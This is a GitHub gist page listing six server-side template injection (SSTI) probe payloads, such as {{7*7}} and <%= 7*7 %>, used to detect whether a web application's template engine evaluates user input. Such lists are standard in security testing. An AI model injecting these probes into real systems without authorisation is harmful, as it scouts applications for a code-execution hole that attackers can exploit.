Skip to content

Instantly share code, notes, and snippets.

@DanaEpp
Created August 22, 2023 22:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save DanaEpp/97bd46dddb535c1060c071aab74b221b to your computer and use it in GitHub Desktop.
Save DanaEpp/97bd46dddb535c1060c071aab74b221b to your computer and use it in GitHub Desktop.
SSTI template expression payloads
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment